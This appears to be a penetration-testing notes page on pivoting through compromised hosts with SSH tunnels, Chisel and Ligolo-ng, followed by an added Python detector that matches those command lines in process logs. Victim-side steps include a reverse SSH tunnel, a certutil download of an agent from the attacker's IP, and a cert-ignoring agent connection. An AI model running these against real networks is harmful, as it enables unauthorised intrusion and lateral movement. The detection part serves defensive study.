# Port Forwarding

## SSH

* Method 1:

{% code overflow="wrap" fullWidth="true" %}

```
On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append the line: socks5 127.0.0.1 <port>
  # Prepend proxychains to any command targeted at the internal network from here on

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x
```

{% endcode %}

* Method 2:

{% code overflow="wrap" fullWidth="true" %}

```
ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port
```

{% endcode %}

## Chisel

{% embed url="<https://github.com/jpillora/chisel>" %}

{% code overflow="wrap" fullWidth="true" %}

```
On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks
```

{% endcode %}

## Ligolo-ng

1. Set up ligolo

{% embed url="<https://github.com/Nicocha30/ligolo-ng>" %}

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkdir ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

```

{% endcode %}

2. Initiate tunnel

{% code overflow="wrap" fullWidth="true" %}

```
On Kali Machine (~/ligolo/proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once the agent joins the server, return to the Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add a listener for each connection the internal network needs to make back to you; internal hosts connect to the pivot machine on the specified port and the traffic is forwarded to the destination
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added
```

{% endcode %}

* Now you can reach the internal network directly, as if it were part of your own network
* The only difference is that the internal machines are talking to your proxy (the pivot point) instead of directly to you
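
Seen from the defender's side, the command lines on this page leave recognisable shapes in process-creation logs. The following is an added example, not part of the original notes or of any of the tools' own code: a small Python matcher run over constructed command lines, with rule names, sample paths and addresses that are this example's own assumptions.

```python
import re

SPEC = re.compile(r"(\S+:)?\d+(:\S+:\d+)?")  # port | bind:port | port:host:port

def _base(token):
    # Drop directory and ".exe" so "./ssh" and "C:\...\ssh.exe" compare alike.
    return re.sub(r"\.exe$", "", re.split(r"[\\/]", token)[-1].lower())

def _forward(args, letter):
    # A short-option group ending in `letter` (-R, -NR) followed by a forwarding spec.
    return any(re.fullmatch(rf"-[A-Za-z]*{letter}", a) and SPEC.fullmatch(b)
               for a, b in zip(args, args[1:]))

def classify(cmdline):
    """Return the names of the tunnelling patterns one command line matches."""
    tokens = cmdline.split()
    if not tokens:
        return []
    exe, args = _base(tokens[0]), tokens[1:]
    lower = [a.lower() for a in args]
    hits = []
    if exe == "ssh" and _forward(args, "R"):
        hits.append("ssh_remote_forward")
    if exe == "ssh" and _forward(args, "L"):
        hits.append("ssh_local_forward")
    # chisel: key on the argument shape, since the binary is easily renamed.
    if "client" in lower and any(re.fullmatch(r"R:(socks|\d+:[^:\s]+:\d+)", a) for a in args):
        hits.append("chisel_reverse_remote")
    if "-connect" in lower and "-ignore-cert" in lower:
        hits.append("ligolo_agent_ignore_cert")
    if exe == "certutil" and "-urlcache" in lower and any(a.startswith("http") for a in lower):
        hits.append("certutil_download")
    return hits

# Constructed process-creation command lines; addresses are placeholders.
SAMPLES = [
    r"ssh -N -R 1080 kali@192.0.2.10",
    r"ssh user@10.0.0.8 -L 8080:127.0.0.1:8080",
    r".\chisel.exe client 192.0.2.10:8001 R:3306:10.0.0.5:3306",
    r"C:\Users\Public\svc.exe client 192.0.2.10:8001 R:socks",
    r"agent.exe -connect 192.0.2.10:11601 -ignore-cert",
    r"certutil -urlcache -split -f http://192.0.2.10/windows/agent.exe",
    r"ssh admin@10.0.0.8 ls -R /tmp",          # benign: -R belongs to ls
    r"certutil -hashfile setup.exe SHA256",    # benign
]

def scan(lines):
    """Pair each matching line with its rule names."""
    return [(line, hits) for line in lines if (hits := classify(line))]

if __name__ == "__main__":
    for line, hits in scan(SAMPLES):
        print(",".join(hits), "|", line)
```

Local forwards (`-L`) are common in normal administration, so that rule is best used for triage rather than alerting; attached option forms such as `-R1080` are not covered by this matcher.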



